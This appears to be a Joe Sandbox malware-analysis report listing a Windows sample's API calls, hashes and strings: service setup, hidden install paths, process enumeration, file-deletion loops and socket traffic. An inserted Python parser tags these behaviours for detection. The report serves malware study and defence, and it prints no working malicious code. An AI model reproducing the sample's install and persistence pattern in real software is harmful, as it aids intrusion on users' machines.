                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$BuffChangeCharCloseConfig2CountEnvironmentExitFirstHandleLowerManagerMessageOpenProcessProcess32SnapshotStartStartupSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Windows\system32\config\systemprofile$C:\whfkpbh\amdrhfskpcu.exe$wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"$@L$}en
                                                                                                                                                                                                            • API String ID: 256806839-120791303
                                                                                                                                                                                                            • Opcode ID: 369658b6b367a4ced69129a6b9e3043cdf76c79c11a1e1c72fbc263f7454970b
                                                                                                                                                                                                            • Instruction ID: e3293a6eb730aeb8f51adb720d26d57176b8f05384c9608a1d62fc2f8fe7eafc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 369658b6b367a4ced69129a6b9e3043cdf76c79c11a1e1c72fbc263f7454970b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F22358B1A00301DFD304EF64FC8AA663BB4FB98301B51461AE54697EB5EB708AE5CF51

Control-flow Graph (function at 155200; legend: Executed / Not Executed)
APIs
• GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
• CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 0015549F
• DeleteFileA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 001556FE
• RemoveDirectoryA.KERNELBASE(00000000,?,?,?,?,?,00000000), ref: 00155743
• CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0015583A
• CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001558F3
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00155D71
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00155E82
• GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 00156029
• CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 001561FF
• GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 001563DE
• SetFileAttributesA.KERNELBASE(?,00000002,?,?,?,?,?,?,00000000), ref: 0015655F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
• String ID: C:\Windows\system32\config\systemprofile$C:\whfkpbh\$\$aE'P$r9:
• API String ID: 1691758827-2593203275
• Opcode ID: dc9f98b22f666bbcf108a18948fa63c92f78fdf39cd281546a33d22608c74b73
• Instruction ID: 1f69f77ae9c2a9888138bc1b0f7bbbd8c8c650dcf00358e654a38ae4449ba2f0
• Opcode Fuzzy Hash: dc9f98b22f666bbcf108a18948fa63c92f78fdf39cd281546a33d22608c74b73
• Instruction Fuzzy Hash: 9FA26BB2A00205DFC704DF24FC96AA53BB5FBA4311B518219E94297EB5FB308AD5CF91
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID:
• String ID: XH$/$U][v
• API String ID: 0-1996962770
• Opcode ID: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
• Instruction ID: 90313c74ff47ac2c4b629f26429c197e08e3fbfd281e0d3b7a6a192a629c6b15
• Opcode Fuzzy Hash: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
• Instruction Fuzzy Hash: C4B25671A00204DFD709EF64FC95AB93BB5FBA4300B55425AE44697EB4EB308AE5CF81

Control-flow Graph
• Executed / Not Executed colouring: not preserved in the text export
• Entry 15a930. Calls in block order: 142f90, 1413e0, 151bb0, GetProcessHeap (15a9b4); 142f90, LoadLibraryA (15ab54); 151bb0 (15abc3); 142f90, GetProcAddress, 151bb0 (15ac8d); FreeLibrary (15acf0) or HeapAlloc (15ad28); FreeLibrary (15add4); GetAdaptersInfo (15adfa); HeapFree (15ae30); HeapAlloc (15ae8a); FreeLibrary (15aeaa); GetAdaptersInfo (15af83); 142f90, 1413e0 (15aff2); 151bb0 (15b06c); loop 15b0b3-15b22e over 16b260; 142f90 (15b233); 1413e0, 151bb0 (15b29a); loop 15b3a4-15b5c8; 16a7e0 (15b5d1, 15b659); HeapFree, FreeLibrary (15b6ad, exit).
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: HeapProcess
• String ID: #~\
• API String ID: 54951025-95464956
• Opcode ID: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
• Instruction ID: f5e059731d034deb7662b2b573f59cf7ee5e479a09cbcd0b11f0d708ed3ccc74
• Opcode Fuzzy Hash: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
• Instruction Fuzzy Hash: 58720E76A04205CFC304DF65FC866A53BF5FB98312B51421AE845DBEB0EB708AE5CB91

Control-flow Graph
• Executed / Not Executed colouring: not preserved in the text export
• Entry 169580. Calls in block order: 152a20, 14d500, Sleep, 14c580, 142f90 (1695fe); 14c580 (16974d); 151bb0, FindFirstFileA (169795); loop 169830-1698d3: 14c580, DeleteFileA, FindNextFileA, back-edge to 169830; FindClose (1698d9); 16a7e0 (169902); return at 169963.
APIs
• Sleep.KERNELBASE(000003E8,00000001), ref: 00169679
• FindFirstFileA.KERNELBASE(?,?), ref: 001697B8
• DeleteFileA.KERNELBASE(?), ref: 001698A9
• FindNextFileA.KERNELBASE(00000000,?), ref: 001698CB
• FindClose.KERNEL32(00000000), ref: 001698E4
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextSleep
• String ID:
• API String ID: 1528862845-0
• Opcode ID: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
• Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
• Opcode Fuzzy Hash: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
• Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91

Control-flow Graph
• Executed / Not Executed colouring: not preserved in the text export
• Entry 1622a0. Calls in block order: 170a20 x2 (162307); 1750e0, 1700c0 (162478); 169580, 14e430, 142f90, 14c580, 151bb0 (1624bd); outer loop 162580-162d3f: 1708b0, 151200 (162580); 14b620 (1626ac); 1708b0 (16276d); 151200 (1627c5); 164af0, 142f90, 160d80 (162815); 151bb0, 14d760, 15d0f0 (162878); 142f90 (162922); 14d530, 151bb0, 171050, 152c30, 15c770, 171050, 14e310, 142f90, 160d80, 151bb0, 14d760 (16296b); 15d0f0 (162b16); 16a7e0 (162b43); 15d990, Sleep, 158cf0, 152120 (162bcc); 16fa80 (162cbd, the block holding both string xrefs listed below); back-edge 162d0d to 162580; return at 162c6e.
APIs
  • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,0016247D), ref: 00170929
  • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
  • Part of subcall function 00151200: Sleep.KERNELBASE(000003E8,?,?,001625B4,?,00000708,00000000), ref: 0015139B
• Sleep.KERNELBASE(000008AE), ref: 00162C03
Strings
• C:\whfkpbh\amdrhfskpcu.exe, xrefs: 00162CCC
• wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe", xrefs: 00162CC7
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: SleepTime$FileSystem__aulldiv
• String ID: C:\whfkpbh\amdrhfskpcu.exe$wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
• API String ID: 3227937447-2559296042
• Opcode ID: 39dec3fa197a23e8428c1119ec35419c93c428d93996f14d5e9a5bac583e8f47
• Instruction ID: 859dc9bc5602d084fa999fe1f82ab3b24767d83da741eb5aafe56970c0b74639
• Opcode Fuzzy Hash: 39dec3fa197a23e8428c1119ec35419c93c428d93996f14d5e9a5bac583e8f47
• Instruction Fuzzy Hash: ED422371A01204DFD708DF64FD96AAA3BB1FB58300F11825AE44697EB4EB309AE5CF51
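
The API listings in this part of the report share one line format: `Name.MODULE(args), ref: ADDR`, with `Part of subcall function ADDR:` prefixed on calls that are reached through a callee rather than made by the function itself. The parser below is an added example and is not code from the Joe Sandbox report or its IDA plugin. It reads those lines into per-function call records and derives verdicts of the kind the report's signatures state: an enumerate-and-delete loop (FindFirstFileA, DeleteFileA, FindNextFileA laid out in that address order), runtime resolution through GetProcAddress, CryptGenRandom use, and total Sleep time including sleeps inside callees. The `function <entry>` separator lines and the sample text are constructed for this example from three listings on this page; the tag names are this example's own, not the report's signature names.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: API lines copied from three listings in this report, each
# preceded by a "function <entry>" separator that is NOT part of the report format.
SAMPLE = """\
function 00169580
• Sleep.KERNELBASE(000003E8,00000001), ref: 00169679
• FindFirstFileA.KERNELBASE(?,?), ref: 001697B8
• DeleteFileA.KERNELBASE(?), ref: 001698A9
• FindNextFileA.KERNELBASE(00000000,?), ref: 001698CB
• FindClose.KERNEL32(00000000), ref: 001698E4
function 001622A0
  • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,0016247D), ref: 00170929
  • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
  • Part of subcall function 00151200: Sleep.KERNELBASE(000003E8,?,?,001625B4,?,00000708,00000000), ref: 0015139B
• Sleep.KERNELBASE(000008AE), ref: 00162C03
function 00150920
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
• CryptGenRandom.ADVAPI32(00000000,00000004,00000000,00000000), ref: 00150C10
"""

FUNC_RE = re.compile(r"^function\s+([0-9A-Fa-f]+)$")
API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"            # "__aulldiv.LIBCMT ref:" carries no argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw hex or '?' tokens exactly as the report prints them
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee that really makes the call; None for a direct call


def parse_report(text: str) -> Dict[int, List[ApiCall]]:
    """Group API lines under the function entry they belong to."""
    funcs: Dict[int, List[ApiCall]] = {}
    current: Optional[int] = None
    for line in text.splitlines():
        m = FUNC_RE.match(line.strip())
        if m:
            current = int(m.group(1), 16)
            funcs.setdefault(current, [])
            continue
        m = API_RE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        funcs[current].append(ApiCall(
            api=m["api"], module=m["mod"], args=args, ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return funcs


def sleep_ms(calls: List[ApiCall], include_subcalls: bool = True) -> int:
    """Sum the dwMilliseconds argument of every Sleep call whose value was recorded."""
    total = 0
    for c in calls:
        if c.api != "Sleep" or (c.subcall_of is not None and not include_subcalls):
            continue
        if c.args and c.args[0] != "?":
            total += int(c.args[0], 16)
    return total


def classify(calls: List[ApiCall]) -> List[str]:
    """Derive behaviour tags from direct calls (tag names are this example's own)."""
    direct = [c for c in calls if c.subcall_of is None]
    names = {c.api for c in direct}

    def first_ref(api: str) -> int:
        return min(c.ref for c in direct if c.api == api)

    tags: List[str] = []
    # Enumerate-and-delete loop: all three calls present and laid out in that address order.
    if {"FindFirstFileA", "DeleteFileA", "FindNextFileA"} <= names and \
            first_ref("FindFirstFileA") < first_ref("DeleteFileA") < first_ref("FindNextFileA"):
        tags.append("file deletion loop")
    if "GetProcAddress" in names:
        tags.append("runtime API resolution")
    if "CryptGenRandom" in names:
        tags.append("CryptoAPI RNG")
    if sleep_ms(calls) >= 1000:          # callee sleeps count: they delay the caller too
        tags.append("sleep >= 1s")
    return tags


def summarize(text: str) -> Dict[str, List[str]]:
    """Map each function entry (printed as the report does, 8 hex digits) to its tags."""
    return {f"{addr:08X}": classify(calls) for addr, calls in parse_report(text).items()}


if __name__ == "__main__":
    for entry, tags in summarize(SAMPLE).items():
        print(entry, ", ".join(tags) or "-")
```

Subcall lines are kept but excluded from the call-order checks, because the report attributes them to the callee's address range, not to the function being examined; they are still counted for sleep time, since a Sleep inside 00151200 delays 001622A0 just as a direct one would.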

Control-flow Graph
• Executed / Not Executed colouring: not preserved in the text export
• Entry 150920. Calls in block order: 163110 (1509be); 142f90, GetProcAddress (150a3a); 142f90, 151bb0, GetProcAddress, 151bb0 (150ac7); CryptGenRandom (150c03); 142860 x2 (150cac); 142860 x2 (150d08); 16fcc0 (150d64).
APIs
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
• CryptGenRandom.ADVAPI32(00000000,00000004,00000000,00000000), ref: 00150C10
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: AddressProc$CryptRandom
• String ID:
• API String ID: 646182245-0
• Opcode ID: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
• Instruction ID: 9a44081cad21fa68937cdfac915acb2760fe07f4e57f5f8e993902d14031d0fe
• Opcode Fuzzy Hash: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
• Instruction Fuzzy Hash: 2AB176B2A00315DBC315DFA9FC85A253BB4FB58715B01422EE8569BEB8E33089D5CF85

Control-flow Graph: function with entry block at 169b00 (graph rendering omitted; executed/not-executed node data not reproduced)
APIs
• GetComputerNameA.KERNEL32(?,00000010), ref: 00169C49
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 9220cc9c9a1f5675a9203f292a9059f11226fd8a05d40183f4828c667a17de15
• Instruction ID: 34e6f4f578bdec1e6be86874b55dc7acfcab8c70e72e6e697f1b4be8d9521ef9
• Opcode Fuzzy Hash: 9220cc9c9a1f5675a9203f292a9059f11226fd8a05d40183f4828c667a17de15
• Instruction Fuzzy Hash: 72621371900205DFD709EF60FC86AA97BB8FBA4300F90815AE446A7DB5EB309AD5CF51
APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0014C692
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: 3c536f3847f32ef5e49169e1599c94027631dae4c457486be30412fe90921ee2
• Instruction ID: a58d952cd8e76c61e1fe2f3448b1df420af2cf5de54f1e50ec7d677e88862a53
• Opcode Fuzzy Hash: 3c536f3847f32ef5e49169e1599c94027631dae4c457486be30412fe90921ee2
• Instruction Fuzzy Hash: 06E01271D01209DBC744DFB4ED4546EBBF4FB88304B814959E414EB650EB705640CFC5

Control-flow Graph: function with entry block at 156c10 (graph rendering omitted; executed/not-executed node data not reproduced)
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(0113E608,Function_00011860), ref: 00156D72
• SetServiceStatus.SECHOST(0114A1C8,001B05F8), ref: 00156DD5
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156DE9
• SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156E8A
• WaitForSingleObject.KERNEL32(00000230,00001388), ref: 00156EBE
• SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156F2B
• CloseHandle.KERNEL32(00000230), ref: 00156F42
• SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156FAA
Strings
Similarity
• API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
• String ID: =ZMI
• API String ID: 3399922960-150576250
• Opcode ID: 40ec19d656a58706c57997c51155d74a87f515a578a80e6159e34f145aafe141
• Instruction ID: 5a1c3a6e04a96dff3e1d90b3f17175ac5cad2d66a39274963f12cd4536c4cc8c
• Opcode Fuzzy Hash: 40ec19d656a58706c57997c51155d74a87f515a578a80e6159e34f145aafe141
• Instruction Fuzzy Hash: 5E91DBB1901301CFC306DF28FD8A9663FB4FB88715781821AE49586EB4E73885E5CF85

Control-flow Graph
• Graph image not reproduced (executed/not-executed colouring lost in extraction). Basic blocks 16fa80-16fcb3; block 16fb20-16fbf9 calls 16a7e0 (x2) and CreateProcessA, block 16fbff-16fc8e calls CloseHandle (x2)
APIs
• CreateProcessA.KERNELBASE(?,00162CD6,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000001), ref: 0016FBF1
• CloseHandle.KERNEL32(00162CD6,?,?,?,?,?,00000001), ref: 0016FC2F
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000001), ref: 0016FC58
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: D
• API String ID: 2922976086-2746444292
• Opcode ID: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
• Instruction ID: b5e36886409db179b7c7625acc9b4959b6bec182829420ef1e314270b64b7669
• Opcode Fuzzy Hash: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
• Instruction Fuzzy Hash: BA51EA31950218DBD704DF64FC86BB63BF8FB48B11F40021AE04696EB4EBB496E4CB95

Control-flow Graph
• Graph image not reproduced (executed/not-executed colouring lost in extraction). Basic blocks 152120-1524fd; CreateToolhelp32Snapshot in block 152196-1521f8, Process32First in block 15224f-152274, Process32Next in block 152346-152396 with a back edge to block 152280-152292 (enumeration loop), FindCloseChangeNotification in block 15240d-15244e; internal calls to 16a7e0, 1413e0, 14a4e0 and 16b260
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
• Process32First.KERNEL32(00000000,00000128), ref: 00152257
• Process32Next.KERNEL32(00000000,00000128), ref: 00152384
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152426
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
• String ID:
• API String ID: 3243318325-0
• Opcode ID: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
• Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
• Opcode Fuzzy Hash: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
• Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51

Control-flow Graph
• Graph image not reproduced (executed/not-executed colouring lost in extraction). Basic blocks 160fd8-16229a. Imported calls in block order: socket (block 161786-1617b0), setsockopt (1617fb-161864), gethostbyname (1618c4-1618e7), inet_ntoa, inet_addr, htons and connect (161976-1619c8), send (1619e0-161a1c), recv (161acc-161b51 and 162135-162181, the second with a back edge to block 161b57-161b69, i.e. a receive loop), closesocket (1621ad-16220e). Internal calls to 14d500, 14e310, 14c580, 142f90, 14d530, 151bb0, 14d670, 1701a0, 171050, 15a810, 143410, 16b940, 157fa0, 16b500, 175820, 14def0, 15d990, 141df0, 150110, 14c530, 154290 and 14c110
Strings
Memory Dump Source
• Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID:
• String ID: XH$/
• API String ID: 0-571299465
• Opcode ID: 86313e4a76824fe82bdf1430199052fe167cbb740b3c353f206373189f083d22
• Instruction ID: ef8cb2bfebd598330e323af41355f5a4dbc948586ff720e8fd952b287562e22a
• Opcode Fuzzy Hash: 86313e4a76824fe82bdf1430199052fe167cbb740b3c353f206373189f083d22
• Instruction Fuzzy Hash: 11F11371A00215DFD714EF60FC92ABA3BB9FB64300F54826AE40A579B1EB708AD4CF50
